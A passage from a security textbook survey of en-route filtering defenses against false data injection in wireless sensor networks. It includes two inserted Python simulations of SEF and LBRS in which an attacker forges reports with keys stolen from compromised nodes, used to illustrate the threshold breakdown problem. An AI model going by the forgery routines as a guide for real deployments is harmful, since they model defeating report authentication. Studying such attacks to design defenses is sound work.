Harter, A., Hopper, A., Steggles, P., Ward, A., & Webster, P. (1999). The anatomy of a context-aware application. Paper presented at the Annual International Conference on Mobile Computing and Networking (ACM Mobicom).

He, T., Huang, C., Blum, B., Stankovic, J., & Abdelzaher, T. (2003). Range-free localization schemes in large scale sensor network. Paper presented at the Annual International Conference on Mobile Computing and Networking (ACM Mobicom).

Hu, L., & Evans, D. (2003). Using directional antennas to prevent wormhole attacks. In Proceedings of the 11th Network and Distributed System Security Symposium (pp. 131-141).

Hu, Y., Perrig, A., & Johnson, D. (2003). Packet leashes: A defense against wormhole attacks in wireless ad hoc networks. Paper presented at the IEEE Conference on Computer Communications (INFOCOM).

Lazos, L., & Poovendran, R. (2004). SeRLoc: Secure range-independent localization for wireless sensor networks. Paper presented at the ACM Workshop on Wireless Security.

Lazos, L., Poovendran, R., & Capkun, S. (2005). Rope: Robust position estimation in wireless sensor networks. Paper presented at the ACM/IEEE Information Processing in Sensor Networks (IPSN).

Li, Z., Trappe, W., Zhang, Y., & Nath, B. (2005). Robust statistical methods for securing wireless localization in sensor networks. Paper presented at the ACM/IEEE Information Processing in Sensor Networks (IPSN).

Liu, D., Ning, P., & Du, W. (2005). Attack-resistant location estimation in sensor networks. Paper presented at the ACM/IEEE Information Processing in Sensor Networks (IPSN).

Nagpal, R., Shrobe, H., & Bachrach, J. (2003). Organizing a global coordinate system from local information on an ad hoc sensor network. Paper presented at the ACM/IEEE Information Processing in Sensor Networks (IPSN).

Nicolescu, D., & Nath, B. (2001). Ad-hoc positioning systems (APS). Paper presented at the IEEE Global Telecommunications Conference (GLOBECOM).

Nicolescu, D., & Nath, B. (2003). Ad hoc positioning system (APS) using AoA. Paper presented at the IEEE Conference on Computer Communications (INFOCOM).



Key Terms

Anchors: Anchors are special sensors that know their locations before localization, through a GPS device equipped on them or through manual configuration.

Localization: Localization in wireless sensor networks is the process by which all sensors obtain their relative or absolute locations, either by themselves or through a network computing center.

Location Verification: Location verification in wireless sensor networks is the process by which correctly estimated locations of sensors can be verified and corrupted locations can be detected.

Range-Based/Range-Free: A localization approach is range-based (or range-free) if it does (or does not) use the measured distance between sensors to estimate their locations.

Secure Localization: Secure localization in wireless sensor networks is the process by which sensors can obtain their locations in the presence of malicious attacks.

Wireless Sensor Network (WSN): A wireless sensor network (WSN) is a wireless network consisting of autonomous devices that cooperatively monitor environmental conditions, such as temperature, sound, pollutants, and so forth.

Wormholes: Wormholes in wireless sensor networks are nonexisting communication tunnels (usually wired links) created by adversaries. The messages received at one end of a wormhole can be transmitted through the tunnel and broadcast at the other end.
robust multi-hop localization scheme in wireless




Chapter XXXVIII
Resilience Against False Data Injection Attack in Wireless Sensor Networks
Miao Ma
The Hong Kong University of Science and Technology, Hong Kong

Copyright © 2008, IGI Global, distributing in print or electronic forms without written permission of IGI Global is prohibited.

Abstract

One of the severe security threats in wireless sensor networks is the false data injection attack, in which compromised sensors forge reports of events that did not occur. To defend against false data injection attacks, six en-route filtering schemes for homogeneous sensor networks are described. Furthermore, a sink filtering scheme for heterogeneous sensor networks is also presented. We find that deploying heterogeneous nodes in a sensor network is an attractive approach because of its potential to increase network lifetime, reliability, and resiliency.

Introduction

Wireless sensor networks (WSN) usually consist of a large number of inexpensive and small nodes with sensing, data processing, and communication capabilities. These nodes are densely deployed in a region of interest and collaborate to accomplish a common task, such as environmental monitoring, military surveillance, and industrial process control. Distinguished from traditional wireless networks and ad hoc networks, WSN are characterized by dense node deployment, unreliable sensor nodes, frequent topology changes, limited power resources, limited computation capacity, and restricted memory space. These unique characteristics and constraints present many new challenges to the design and implementation of WSN.

For many mission-critical applications, the sensor nodes are deployed in an unattended or often hostile environment, and WSN face many security and privacy challenges. One challenge is that when deployed in hostile environments, sensor nodes may be captured or compromised by adversaries. Then the adversaries can obtain the secret keys
stored in the compromised nodes and misuse them to launch insider attacks. Therefore, a nonresilient security protection scheme will exhibit a threshold breakdown problem. That is, the design is secure against t or fewer compromised nodes, but once more than t nodes are compromised the security design completely breaks down, where t is a fixed threshold. Since in reality nobody can prevent an attacker from compromising more than t nodes, such a security protection solution cannot meet the resilience requirement. Our expectation in terms of resilience is that compromising t nodes in a certain area should only enable an adversary to forge nonexisting events in that specific area, and nowhere else. Put in other words, for an attacker, the only way to generate a valid report on a nonexisting event happening in a certain area is to compromise t nodes in that area.

In this chapter, we overview several schemes that have been proposed to defend against compromised nodes. We will show that several schemes are only resilient against a small, fixed number of compromised nodes and exhibit the threshold breakdown problem, while subsequent schemes partially or completely solve it.

The rest of this chapter is organized as follows. In the next section, we introduce the background. Then several en-route filtering schemes in a homogeneous sensor network are presented. Furthermore, a sink filtering scheme in a heterogeneous sensor network is shown. Finally, the last section concludes the chapter.

Background

False Data Injection Attacks

We consider a sensor network which consists of hundreds or thousands of low-cost sensors. Each sensor senses and collects data from the environment. There is at least one base station (or sink), which is typically a resource-abundant computer equipped with sufficient computation and storage capabilities. We assume that the sensor nodes are deployed at high density, so that once an event happens it can be detected by multiple sensors. However, it is inefficient and also unnecessary for every sensor node to report its raw data to the sink node, because: (1) every data packet usually needs to travel many hops (e.g., tens or even more) to reach the sink; (2) each sensor node is often constrained by scarce resources in memory, computation, communication, and battery; and (3) in many cases there is high redundancy in the raw data. Hence, raw data are often fused and aggregated locally, and only the aggregated information is returned to the sink. In such a setting, certain nodes in the sensor network function as cluster heads (CHs) to collect the raw sensing data from the sensors, process it locally, and return the aggregation report to the sink. Once the sink receives an event report, it may take action accordingly.

Unfortunately, the above event detection and reporting process can be seriously threatened by false data injection attacks. As stated above, sensors are usually deployed in unattended or even hostile environments, and an adversary may capture or compromise sensor nodes. Once this happens, the compromised nodes can easily inject false data reports of nonexisting events. Even worse, when an adversary compromises more nodes and combines all the obtained secret keys, the adversary can freely forge event reports which not only "happen" at the locations where the nodes were compromised, but also at arbitrary locations in the field. These fabricated reports not only produce false alarms (and lead to false positives), but also waste valuable network resources, such as energy and bandwidth, when the forged reports are delivered to the base station. Therefore, it is important to design an effective filtering scheme to defend against such attacks and minimize their impact.

In this chapter, we consider the following threat model. The attacker may compromise multiple sensor nodes in the network, but cannot compromise the sink. Once a sensor node is compromised, the attacker obtains all secret keys, data, and code stored in the sensor. Whenever more nodes are compromised, the attacker can combine all the secret keys it has obtained, and can also load a compromised node with the secret keys obtained
from other compromised nodes. We also assume that the attacker cannot successfully compromise a node during the short deployment phase.

Besides the report fabrication attack, there are various other attacks in wireless sensor networks. For example, a compromised node may simply not report an event that occurs (which leads to a false negative), or a compromised node may replay a legitimate report, and so forth. However, these threats are addressed in other related work and are not the focus of this chapter. Instead, in this chapter we overview several schemes that have been proposed to reduce false positives, that is, to prevent an attacker from fabricating reports about events that do not occur. Two main design goals of these schemes are summarized as follows:

1. Resilience against a large number of compromised nodes: A good protection scheme is expected to degrade gracefully as the number of compromised sensors increases, without the threshold breakdown problem.
2. Adaptive to dynamic topology: The scheme can deal with the dynamic topology of sensor networks and is scalable for large-scale sensor networks.

En-Route Filtering Framework

The statistical en-route filtering mechanism (SEF) (Ye, Luo, Lu, & Zhang, 2004) is the first effort that addresses false data injection attacks in the presence of compromised sensors; the en-route filtering framework was originally proposed there. The en-route filtering framework has three components: report generation using message authentication codes (MACs), en-route filtering, and sink verification.

Report Generation Using MACs

To generate a valid report, multiple (say m, where m > 1) nodes detect the event simultaneously and agree on the content of the event report. To be forwarded by intermediate nodes and accepted by the sink, each valid report must carry m MACs; each MAC is generated by a sensing node that detects the event. Each sensor stores a few symmetric secret keys, and the MAC is generated using one of these keys.

En-Route Filtering

By using a suitable key assignment scheme, any intermediate node is able to verify the report, either with a certain probability or deterministically. Whenever an intermediate node receives a report, it first checks whether the report carries m distinct MACs; it then checks whether it stores a key in common with one of the sensing nodes. If so, it checks whether the carried MAC is the same as the MAC it computes with its locally stored key. It drops the report when any of these checks fails. Otherwise (i.e., it does not have any of the keys, or the MACs it can check are correct), it forwards the report as usual. Notice that although the filtering power of any single node is limited, the collective filtering power along the forwarding path is significant: the more hops a forged report travels, the higher the chance that it is dropped en route.

Sink Verification

The en-route filtering performed by the intermediate nodes may be probabilistic in nature, and thus cannot guarantee that all forged reports are detected and dropped. The sink serves as the final guard that rejects any escaping ones. Because the sink knows all the keys, it can verify each MAC carried in a report. On the basis of the number of correct MACs each report carries, the sink decides whether or not to accept the event.

Besides the SEF scheme, five more designs, namely interleaved hop-by-hop authentication (IHA) (Zhu, Setia, Jajodia, & Ning, 2004), commutative cipher-based en-route filtering (CCEF) (Yang & Lu, 2004), location-based resilient security (LBRS) (Yang, Ye, Yuan, Lu, & Arbaugh, 2005), location-aware end-to-end data security (LEDS) (Ren, Lou, & Zhang, 2006), and dynamic en-route filtering (DEF) (Yu & Guan, 2006), are all specific instances of the above framework. Within this framework, these five proposals have adopted different key management schemes, which directly lead to different resilience behavior of their designs. We describe their methodologies in detail in the subsequent sections.
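The following is an added worked example (not code from the chapter or from Ye et al., 2004) that simulates the three components above as SEF instantiates them: a global key pool split into T partitions, each node preloaded with K keys from a single partition, reports carrying M MACs from M distinct partitions, forwarders that can only check MACs under keys they happen to share, and a sink that checks everything (the partitioning itself is described in the next section). Pool size, T, K, M, the truncated HMAC-SHA256 MAC, the 30-hop path and the event body are assumptions made for the illustration. It also makes the threshold breakdown concrete: once the keys stolen from compromised nodes span M partitions, the attacker's forgery for any event carries M genuine MACs and is indistinguishable from a real report at every hop and at the sink.

```python
"""SEF-style en-route filtering, simulated end to end.
Added example, not code from the chapter or Ye et al. (2004); pool size,
partition count, keys per node, MAC length and path layout are assumptions."""
import hashlib, hmac, random

T = 10              # key-pool partitions (assumption)
KEYS_PER_PART = 50  # keys per partition, pool size 500 (assumption)
K = 5               # keys loaded into each node, all from one partition (assumption)
M = 5               # MACs a valid report must carry (assumption)
MAC_LEN = 8         # bytes of HMAC-SHA256 kept per MAC (assumption)

def make_pool(seed=1):
    """Global key pool; index i belongs to partition i // KEYS_PER_PART."""
    rng = random.Random(seed)  # constructed, deterministic keys
    return [rng.getrandbits(128).to_bytes(16, "big") for _ in range(T * KEYS_PER_PART)]

def partition_of(idx):
    return idx // KEYS_PER_PART

def mac(key, msg):
    return hmac.new(key, msg, hashlib.sha256).digest()[:MAC_LEN]

def deploy_node(pool, rng):
    """A node is its key store: K indices drawn from one random partition."""
    lo = rng.randrange(T) * KEYS_PER_PART
    return {i: pool[i] for i in rng.sample(range(lo, lo + KEYS_PER_PART), K)}

def nodes_covering(pool, rng, m):
    """Deploy nodes until their partitions span m distinct ones."""
    nodes, parts = [], set()
    while len(parts) < m:
        node = deploy_node(pool, rng)
        p = partition_of(next(iter(node)))
        if p not in parts:
            parts.add(p)
            nodes.append(node)
    return nodes

def endorse(event, detectors, m=M):
    """CH-side report generation: one MAC per detecting node, each under a key
    from a distinct partition. None if m partitions cannot be covered."""
    used, macs = set(), []
    for node in detectors:
        idx = next(iter(node))
        if partition_of(idx) not in used:
            used.add(partition_of(idx))
            macs.append((idx, mac(node[idx], event)))
        if len(macs) == m:
            return (event, macs)
    return None

def forge(event, stolen, rng, m=M):
    """Attacker with `stolen` keys (idx -> key): genuine MACs for the partitions
    it covers, guessed tags under random indices of other partitions for the rest."""
    used, macs = set(), []
    for idx, key in stolen.items():
        if partition_of(idx) not in used and len(macs) < m:
            used.add(partition_of(idx))
            macs.append((idx, mac(key, event)))
    while len(macs) < m:
        p = rng.choice([q for q in range(T) if q not in used])
        used.add(p)
        idx = rng.randrange(p * KEYS_PER_PART, (p + 1) * KEYS_PER_PART)
        macs.append((idx, rng.getrandbits(8 * MAC_LEN).to_bytes(MAC_LEN, "big")))
    return (event, macs)

def well_formed(macs, m):
    return len(macs) == m and len({partition_of(i) for i, _ in macs}) == m

def en_route_ok(node, report, m=M):
    """Forwarder check: m MACs from m distinct partitions, and every MAC under a
    key this node also holds must recompute; MACs under unknown keys pass."""
    event, macs = report
    return well_formed(macs, m) and all(
        mac(node[i], event) == tag for i, tag in macs if i in node)

def sink_ok(pool, report, m=M):
    """The sink knows the whole pool, so every MAC must verify."""
    event, macs = report
    return well_formed(macs, m) and all(mac(pool[i], event) == tag for i, tag in macs)

def deliver(pool, path, report):
    """(hops_travelled, accepted): the hop where a forwarder dropped the report,
    or the full path length together with the sink's verdict."""
    for hop, node in enumerate(path):
        if not en_route_ok(node, report):
            return hop, False
    return len(path), sink_ok(pool, report)

def scenario(stolen_partitions=2, path_len=30, seed=3):
    """Legitimate report vs. a forgery whose stolen keys span `stolen_partitions`
    partitions; at stolen_partitions >= M the forgery passes every check."""
    rng = random.Random(seed)
    pool = make_pool()
    path = [deploy_node(pool, rng) for _ in range(path_len)]
    event = b"intrusion@cell(4,7)"  # constructed event report body
    legit = endorse(event, nodes_covering(pool, rng, M))
    stolen = {}
    for node in nodes_covering(pool, rng, stolen_partitions):
        stolen.update(node)
    return {"legit": deliver(pool, path, legit),
            "forged": deliver(pool, path, forge(event, stolen, rng))}
```

`scenario(2)` returns a forgery that is dropped at some hop or rejected by the sink, while `scenario(M)` returns `{"legit": (30, True), "forged": (30, True)}`: the same pipeline accepts the forgery, which is the threshold breakdown in one line. Note that forwarders trust MACs under keys they do not hold; that is what makes the per-hop check probabilistic rather than deterministic, and why the sink is needed as the last line of defense.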


Schemes in the En-Route Filtering Framework

Statistical En-Route Filtering

Methodology

In statistical en-route filtering (Ye et al., 2004), there is a global key pool which is divided into T nonoverlapping partitions. Before deployment, each node randomly selects a few keys from a single partition and is then loaded with these keys and their associated key indices. Once an event occurs, each sensing node generates a MAC using a key from a different partition. The cluster head (CH) node collects the MACs and attaches them to the report. Every intermediate node has the same predetermined probability of detecting and filtering a false report, and hence SEF filters the forged reports en route in a probabilistic manner. The sink can always verify every report because it knows the entire key pool. As a result, most of the forged reports are quickly dropped by the forwarding nodes, and the few escaping ones are rejected at the sink.

Features

First, SEF suffers from the threshold breakdown problem. Second, SEF is independent of dynamic topology changes of the sensor network, and hence is robust against node failures and routing path changes.

Interleaved Hop-by-Hop Authentication

Methodology

Distinguished from SEF, interleaved hop-by-hop authentication (Zhu et al., 2004) verifies the reports deterministically, in an interleaved, hop-by-hop fashion. In the deployment phase, each node is preloaded with a unique ID and keying material that allows it to establish a pair-wise key with another node. The nodes form multiple clusters and each cluster has at least (t + 1) nodes, where t is a design parameter. Each cluster head discovers a path to the sink. Along the path, two nodes that are (t + 1) hops apart are associated by establishing a pair-wise key. Upon an event, each detecting node computes two MACs, one using its key shared with the sink and the other using its pair-wise key shared with its downstream associated node. The cluster head sends out a final report that carries MACs from (t + 1) detecting nodes. In the en-route filtering phase, each forwarding node verifies the MAC from its upstream associated node. Upon successful verification, it replaces the old MAC with a new one computed using its pair-wise key shared with its downstream associated node. The sink performs a final verification on the report. IHA guarantees that if no more than t nodes are compromised, the base station will detect any false data packets injected by the compromised sensors.

Features

First, IHA suffers from the threshold breakdown problem, similarly to SEF. Second, since IHA requires that the messages transmitted from the base station to a cluster head and from the cluster head to the base station follow the same fixed path, the IHA scheme is not suitable for sensor networks with dynamic topology.

Commutative Cipher-Based En-Route Filtering

As discussed above, both the SEF and IHA schemes suffer from the threshold breakdown problem. To solve this problem, a commutative cipher-based en-route filtering scheme (Yang & Lu, 2004) was presented on the basis of public-key algorithms.

Methodology

CCEF exploits the typical query-response operational mode of sensor networks and installs security state in the nodes in an on-demand manner. Specifically, in CCEF, each node has a unique ID and is preloaded with a unique node key before deployment. When reports are needed, the base station sends an encrypted session key
to the desired cluster head, and a witness key in plain text to all forwarding nodes along the path, through a query message. A legitimate report is endorsed by a node MAC jointly generated by the detecting nodes using their node keys, and a session MAC generated by the source node using the session key. Through the use of a commutative cipher, a forwarding node can use the witness key to verify the session MAC without knowing the session key, and drop fabricated reports. The base station further verifies the node MAC in the report that it receives, and refreshes the session key upon detection of compromised nodes.

Features

First, CCEF solves the threshold breakdown problem. Second, CCEF suffers from the dynamic topology problem, similarly to the IHA scheme, since it requires the same fixed path for messages in both directions between the base station and the cluster head. Third, CCEF uses commutative ciphers that are based on public-key algorithms, which have been reported to be unsuitable for sensor networks (Eschenauer & Gligor, 2002).

Location-Based Resilient Security

To mitigate the threshold breakdown problem identified in the IHA and SEF schemes, a location-based resilient security scheme (Yang et al., 2005) was proposed which exploits a location-based approach as its fundamental mechanism.

Methodology

LBRS divides the terrain into a geographic grid and binds multiple keys to each cell of it. Such keys are termed location-binding keys. Each node stores two types of keys. The first type is for the local cells within its sensing range, called sensing cells. Each node stores one key for each of its sensing cells. Such keys are used to endorse events detected in those cells. The second type is for a few randomly chosen remote cells, called verifiable cells. Each node also stores one key for each of its verifiable cells. Such keys are used to verify events claimed to happen in those cells. Each legitimate report carries m distinct MACs, jointly generated by the detecting nodes using the keys bound to the event's cell. When an intermediate node receives a report, it retrieves the event's location from the report and checks whether the location is in one of its verifiable cells. If so, it checks whether it has one of the keys whose indices are carried in the report. If it has such a key, it recomputes the MAC and compares it to the carried one. If the two MACs do not match, the report is dropped. Otherwise, it forwards the report. The sink performs final verification on the received reports. It knows all location-binding keys and is thus able to verify every MAC in the report.

Features

First, compared with the SEF and IHA schemes, LBRS partly solves the threshold breakdown problem, since compromising a certain number of nodes only enables the attacker to fabricate events "appearing" in certain areas without being detected. However, it is still far from achieving the expected data authenticity requirement: to generate a valid report on a nonexisting event happening in a certain area, the only way should be to compromise T nodes in that area, and otherwise it should be impossible. Second, LBRS is suitable for sensor networks with dynamic topology.

Location-Aware End-to-End Data Security

Later on, Ren et al. (2006) came up with location-aware end-to-end data security to address the vulnerabilities in existing security designs, by exploiting the static and location-aware nature of WSNs.

Methodology

In LEDS, each node computes three different types of location-aware keys: (a) two unique secret keys shared between the node and the sink, used to provide node-to-sink authentication; (b) one cell key shared with the other nodes in the same cell that
is used to provide data confidentiality; and (c) a set of authentication keys shared with the nodes in its report-auth cells and used to provide cell-to-cell authentication and en-route bogus data filtering. All these keys are computed by each node locally and independently. In addition, LEDS adopts a (t, T) threshold linear secret sharing scheme (LSSS) so that the sink can recover the original report from any t out of T legitimate report shares. Moreover, LEDS adopts a one-to-many data forwarding approach, that is, every report in LEDS can be authenticated by multiple next-hop nodes independently, so that no report can be dropped by a single node.

Features

First, LEDS meets the expected requirement in terms of resilience, completely solving the threshold breakdown problem. Second, LEDS is suitable for sensor networks with dynamic topology.

Dynamic En-Route Filtering

At about the same time, Yu and Guan (2006) presented a dynamic en-route filtering scheme.

Methodology

In DEF (Yu & Guan, 2006), a legitimate report is endorsed by multiple sensing nodes using their own authentication keys generated from one-way hash chains. A cluster head (CH) uses a hill-climbing approach to disseminate the authentication keys of the sensing nodes to the forwarding nodes along multiple paths towards the base station. In the filtering phase, each forwarding node validates the authenticity of the reports and drops the false ones.

Features

First, compared with the SEF and IHA schemes, DEF can tolerate a larger number of compromised nodes. However, the DEF scheme still cannot meet the expected requirement in terms of resilience, as LEDS does. Second, DEF can deal with the dynamic topology of sensor networks, but the overhead incurred (in disseminating the authentication keys to the forwarding nodes) is high. Third, as the authors discuss in their paper, DEF introduces some new types of attacks specific to its scheme.

Schemes in Heterogeneous Sensor Networks

In the previous section, we looked at some of the security protection schemes in homogeneous sensor networks. However, there is another class of sensor networks, heterogeneous sensor networks, which use two or more types of nodes. It is known that the presence of heterogeneous nodes in a sensor network helps to increase network lifetime and reliability. In this section, we present the design of a sink filtering scheme (SFS) (Ma, 2006a, 2006b) in a heterogeneous network, showing that the presence of heterogeneous nodes in a sensor network also helps to improve resiliency.

Model of a Heterogeneous Sensor Network

We consider a heterogeneous sensor network where two types of sensors are deployed: basic sensors and cluster heads. A basic sensor is simple, inexpensive and power-limited, while a CH has more processing and communication capability, a richer power supply, and is more compromise-resilient.

We regard the target deployment area as a two-dimensional square region of size A². The sink is located at the center (0, 0). The deployment area is divided into C equal-size grids (i.e., clusters), each of size a². The basic sensors are uniformly distributed across the entire deployment area. Without loss of generality, we assume that each CH is deployed at the center of its grid. Each basic sensor is assigned to the nearest CH. Every basic sensor and CH has a unique identification (ID).

Sink Filtering Scheme (SFS)

The two types of sensors and the sink node implement different tasks in SFS. A basic sensor senses events and provides its CH with a proof for any aggregation
report it has agreed to. A CH collects raw sensing data from the basic sensors, generates an aggregation report, and relays the report to the sink node. The sink node checks the validity of the MACs carried in an aggregation report and filters out forged reports.

Methodology

We assume that the basic sensors are deployed at high density. Once a real event occurs, n basic sensors within sensing range can sense it. Instead of communicating directly with the sink, each basic sensor only communicates with its CH. Each CH collects raw sensing data from the basic sensors within its cluster, generates an aggregation report, and then relays the report to the sink node. Since the average number of hops each report has to travel from a CH to the sink in a heterogeneous sensor network is much smaller than in a homogeneous sensor network, the design is more energy-saving, efficient, and scalable.

The key management for the clusters of the heterogeneous sensor network is as follows. (a) Before deployment, each sensor (either a basic sensor or a CH) shares a secret key with the sink. (b) We assume the neighborhood relationship among CHs is known in advance. Before deployment, each CH is simply preloaded with eight pair-wise keys, one for each of its eight immediate neighboring CHs. The CHs therefore organize themselves into a static ad hoc network. (c) Upon deployment, each basic sensor establishes a pair-wise key with its one-hop neighboring basic sensors; the one-hop pair-wise key establishment scheme of LEAP (Zhu, Setia, & Jajodia, 2003) is adopted to achieve this goal. (d) Upon deployment, each CH establishes a pair-wise key with every basic sensor within its cluster; the one-hop (or multi-hop, whenever a basic sensor cannot reach its CH in a single hop) pair-wise key establishment scheme of LEAP (Zhu et al., 2003) is used for this purpose.

Features

First, SFS meets the expected requirement in terms of resilience, completely solving the threshold breakdown problem. Second, SFS is adaptive to dynamic topology. Third, compared with all the schemes in homogeneous sensor networks, SFS in heterogeneous sensor networks is more efficient and scalable. Interested readers may refer to the works by Ma (2006a, 2006b) for more details on the resiliency study and overhead evaluation.

Conclusion

In this chapter, we presented six en-route filtering schemes in a homogeneous sensor network, including statistical en-route filtering (SEF), interleaved hop-by-hop authentication (IHA), commutative cipher-based en-route filtering (CCEF), location-based resilient security (LBRS), location-aware end-to-end data security (LEDS), and dynamic en-route filtering (DEF). Furthermore, a sink filtering scheme in a heterogeneous sensor network was also introduced. Our study demonstrates that exploiting heterogeneity in sensor networks also helps to improve resiliency.

References

Eschenauer, L., & Gligor, V. D. (2002). A key-management scheme for distributed sensor networks. Paper presented at the ACM CCS.

Ma, M. (2006a). Resilient against report fabrication attack in clusters of heterogeneous sensor networks. Paper presented at the IEEE WCNC.

Ma, M. (2006b, December). Resilience of sink filtering scheme in wireless sensor networks. Computer Communications, 30(1), 55-65. Elsevier.

Ren, K., Lou, W., & Zhang, Y. (2006). LEDS: Providing location-aware end-to-end data security in wireless sensor networks. Paper presented at the IEEE INFOCOM.

Yang, H., & Lu, S. (2004). Commutative cipher based en-route filtering in wireless sensor networks. Paper presented at the IEEE VTC.
Yang, H., Ye, F., Yuan, Y., Lu, S., & Arbaugh, W. (2005). Toward resilient security in wireless sensor networks. Paper presented at the ACM MobiHoc (pp. 34-45).

Ye, F., Luo, H., Lu, S., & Zhang, L. (2004). Statistical en-route filtering of injected false data in sensor networks. Paper presented at the IEEE INFOCOM.

Yu, Z., & Guan, Y. (2006). A dynamic en-route scheme for filtering false data injection in wireless sensor networks. Paper presented at the IEEE INFOCOM.

Zhu, S., Setia, S., & Jajodia, S. (2003). LEAP: Efficient security mechanisms for large-scale distributed sensor networks. Paper presented at the ACM CCS.

Zhu, S., Setia, S., Jajodia, S., & Ning, P. (2004). An interleaved hop-by-hop authentication scheme for filtering of injected false data in sensor networks. Paper presented at the IEEE Symposium on Security and Privacy (S&P).

Key Terms

Aggregation Report: A data structure that synthesizes the state of the phenomena that the wireless sensor network is monitoring.

Compromised Nodes: Nodes on which an attacker has gained control after network deployment.

False Data Injection Attack: The type of attack in which compromised sensors forge events that do not occur.

Key Management: The process of managing key material (e.g., key generation, key distribution, etc.) in a cryptosystem.

Message Authentication Code (MAC): A short piece of information used to authenticate a message.

Threshold Breakdown Problem: We say a security design has the threshold breakdown problem if the design is secure against t or fewer compromised nodes, but once more than t nodes are compromised the security design completely breaks down, where t is a fixed threshold.

Wireless Sensor Network (WSN): A wireless network consisting of small sensors that cooperatively monitor environmental conditions, such as temperature, humidity, and so forth.
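To close the chapter with a worked illustration of the location-binding idea described under Location-Based Resilient Security above, here is an added Python example (not code from the chapter or from Yang et al., 2005). Every cell of a grid has KEYS_PER_CELL keys; a node stores one key for each cell in its 3x3 sensing neighbourhood and one key for each of V randomly chosen remote verifiable cells; a report names its cell and carries M tags under M distinct keys of that cell; a forwarder verifies only when the named cell is one of its verifiable cells; the sink, which here derives every cell key from a master secret, verifies all tags. Grid size, KEYS_PER_CELL, M, V, the HMAC key derivation, the sensing range, the 20-hop path and the event body are assumptions. The scenario shows both halves of the chapter's verdict on LBRS: an attacker who compromises enough nodes in cell (1,1) to hold M of its keys can forge events there undetected, but the same material lets it claim nothing at (6,6) unless M keys of that cell were also among what it stole.

```python
"""LBRS-style location-binding keys, simulated end to end.
Added example, not code from the chapter or Yang et al. (2005); grid size, keys
per cell, m, the key derivation and the 3x3 sensing range are assumptions."""
import hashlib, hmac, random

GRID = 8           # GRID x GRID cells (assumption)
KEYS_PER_CELL = 6  # location-binding keys per cell, indexed 0..5 (assumption)
M = 3              # distinct MACs a valid report must carry (assumption)
V = 4              # remote "verifiable" cells stored per node (assumption)
MAC_LEN = 8        # bytes of HMAC-SHA256 kept per MAC (assumption)

def cell_key(master, cell, idx):
    """Key idx bound to `cell`; HMAC derivation from a sink master secret is an assumption."""
    return hmac.new(master, b"%d,%d,%d" % (cell[0], cell[1], idx), hashlib.sha256).digest()

def mac(key, cell, event):
    # The claimed cell is part of the MAC input, so a tag cannot be replayed elsewhere.
    return hmac.new(key, b"%d,%d|" % cell + event, hashlib.sha256).digest()[:MAC_LEN]

def deploy_node(master, cell, rng):
    """Node at `cell`: one key per sensing cell (3x3 neighbourhood) and one key per
    random remote verifiable cell, each stored as cell -> (idx, key)."""
    sensing, verifiable = {}, {}
    for c in [(cell[0] + dx, cell[1] + dy) for dx in (-1, 0, 1) for dy in (-1, 0, 1)
              if 0 <= cell[0] + dx < GRID and 0 <= cell[1] + dy < GRID]:
        i = rng.randrange(KEYS_PER_CELL)
        sensing[c] = (i, cell_key(master, c, i))
    while len(verifiable) < V:
        c = (rng.randrange(GRID), rng.randrange(GRID))
        if c not in sensing and c not in verifiable:
            i = rng.randrange(KEYS_PER_CELL)
            verifiable[c] = (i, cell_key(master, c, i))
    return {"sensing": sensing, "verifiable": verifiable}

def nodes_with_distinct_keys(master, cell, rng, m=M):
    """Deploy nodes located in `cell` until they hold m distinct keys of it."""
    nodes, idxs = [], set()
    while len(idxs) < m:
        node = deploy_node(master, cell, rng)
        nodes.append(node)
        idxs.add(node["sensing"][cell][0])
    return nodes

def endorse(cell, event, detectors, m=M):
    """Report = (cell, event, m (idx, tag) pairs under m distinct keys of `cell`)."""
    used, macs = set(), []
    for node in detectors:
        idx, key = node["sensing"].get(cell, (None, None))
        if key is not None and idx not in used:
            used.add(idx)
            macs.append((idx, mac(key, cell, event)))
        if len(macs) == m:
            return (cell, event, macs)
    return None

def steal_keys(nodes):
    """Union of everything the compromised nodes store: cell -> {idx: key}."""
    stolen = {}
    for node in nodes:
        for c, (i, k) in list(node["sensing"].items()) + list(node["verifiable"].items()):
            stolen.setdefault(c, {})[i] = k
    return stolen

def forge(cell, event, stolen, rng, m=M):
    """Claim an event in `cell` with the stolen keys of that cell; guess the rest."""
    macs = [(i, mac(k, cell, event)) for i, k in list(stolen.get(cell, {}).items())[:m]]
    while len(macs) < m:
        i = rng.choice([j for j in range(KEYS_PER_CELL) if j not in dict(macs)])
        macs.append((i, rng.getrandbits(8 * MAC_LEN).to_bytes(MAC_LEN, "big")))
    return (cell, event, macs)

def en_route_ok(node, report, m=M):
    """Forwarder: check only if the claimed cell is one of its verifiable cells."""
    cell, event, macs = report
    if len(macs) != m or len({i for i, _ in macs}) != m:
        return False
    if cell not in node["verifiable"]:
        return True
    idx, key = node["verifiable"][cell]
    return all(mac(key, cell, event) == tag for i, tag in macs if i == idx)

def sink_ok(master, report, m=M):
    """The sink derives every location-binding key, so every tag must verify."""
    cell, event, macs = report
    return len(macs) == m and len({i for i, _ in macs}) == m and all(
        mac(cell_key(master, cell, i), cell, event) == tag for i, tag in macs)

def deliver(master, path, report):
    for hop, node in enumerate(path):
        if not en_route_ok(node, report):
            return hop, False
    return len(path), sink_ok(master, report)

def scenario(seed=5, path_len=20):
    """Compromise cell (1,1) until M of its keys are held, then forge at (1,1) and (6,6)."""
    rng = random.Random(seed)
    master = b"sink-master-secret"  # constructed
    path = [deploy_node(master, (rng.randrange(GRID), rng.randrange(GRID)), rng)
            for _ in range(path_len)]
    event, far, near = b"intrusion", (6, 6), (1, 1)  # constructed
    legit = endorse(far, event, nodes_with_distinct_keys(master, far, rng))
    compromised = nodes_with_distinct_keys(master, near, rng)
    stolen = steal_keys(compromised)
    return {"legit_far": deliver(master, path, legit),
            "forged_near": deliver(master, path, forge(near, event, stolen, rng)),
            "forged_far": deliver(master, path, forge(far, event, stolen, rng)),
            "stolen_far_keys": len(stolen.get(far, {})),
            "nodes_compromised": len(compromised)}
```

`scenario()` returns the delivery outcome of a legitimate report from (6,6), of the forgery at (1,1) (accepted, since all of its tags are genuine) and of the forgery at (6,6) (dropped at some hop or rejected by the sink), together with how many nodes the attacker had to compromise and how many keys of the far cell it picked up along the way; that last number is the only thing that decides whether the far forgery succeeds, which is exactly the partial guarantee the chapter attributes to LBRS. Binding the claimed cell into the MAC input matters: without it, a tag endorsed for one location could be reused for another.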




Chapter XXXIX
Survivability of Sensors with Key and Trust Management

Jean-Marc Seigneur
University of Geneva, Switzerland

Luminita Moraru
University of Geneva, Switzerland

Olivier Powell
University of Patras, Greece

ABSTRACT

